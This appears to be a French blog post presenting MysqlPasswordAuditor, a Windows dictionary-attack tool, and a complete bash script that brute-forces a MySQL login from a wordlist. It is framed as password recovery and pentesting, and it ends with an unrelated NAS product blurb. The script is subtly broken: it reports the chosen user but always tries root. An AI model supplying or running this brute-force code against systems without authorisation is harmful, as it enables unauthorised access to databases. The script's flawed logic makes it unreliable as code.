Korben, roi d’internet, logo bébé avec des lunettes en mode thug life Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Korben Upgrade your mind

Cracker un mot de passe MySQL

Si vous avez perdu votre mot de passe MySQL ou que vous avez besoin de pentester le machin, il existe un petit soft qui s’appelle MysqlPasswordAuditor qui va vous sauver la vie. Cet outil utilise une méthode d’attaque par dictionnaire et vous permettra par exemple de vérifier si vos serveurs MySQL ne présentent pas quelques faiblesses en ce qui concerne la solidité des mots de passe.

MySQLPasswordAuditor fonctionne uniquement sous Windows et dispose d’une interface graphique limpide. Bref, un petit outil à rajouter à votre boite à outil de hacker.

Si vous connaissez des équivalents qui tournent sur d’autres OS que Windows, je suis preneur. J’ai vu une technique pour bruteforcer MySQL à partie de Metasploit, j’essayerai de voir ce que ça donne à l’occaz.

A télécharger ici.

Edit : Et en bonus un petit script bash qui fait exactement la même chose. Merci à Shellgratuit pour le partage.

#!/bin/bash
DICTPATH=$1
if [ ! -n "$1" ]; then
        echo "Usage: ./hackmysql.sh <chemin du dictionnaire> [utilisateur]"
        echo "L'utilisateur est root si non spécifié."
        echo "Le dictionnaire doit être formé de un mot de passe à tester par ligne."
        exit
fi
if [ ! -e "$DICTPATH" ]; then
        echo "Dictionnaire introuvable à $DICTPATH"
        exit 1
fi
if [ -n "$2" ]; then
        echo "Test avec l'utilisateur $2"
else
        echo "Test avec l'utilisateur root"
fi
for mot in `cat $DICTPATH`; do
        mysql -uroot --password="$mot" -e quit 2> /dev/null
        if [ "$?" == "0" ]; then
                echo "Mot de passe trouvé: $mot"
                exit
        fi
done
echo "Le mot de passe n'a pas été trouvé."

Source


Serveur NAS Synology DS218J – une valeur sûre dans un monde de brut

Le serveur NAS Synology DiskStation DS218j, c’est une solution performante de stockage conçue pour les particuliers, qui vous donne la possibilité de vous créer un cloud personnel. Muni de 2 baies, il est parfait pour un usage domestique. Son excellent débit séquentiel de 113 Mo/s en lecture et 112 Mo/s en écriture est rendu possible grâce à son double processeur Marvell Armada 385 88F6820 double coeur à 1,3 GH, avec moteur de chiffrement matériel.

Ce serveur NAS s’adapte sans effort aux environnements Windows, Mac ou Linux. Vous pouvez garder et synchroniser vos données Dropbox, Google Drive, Microsoft OneDrive, Baidu et Box sur votre serveur grâce au Cloud Sync.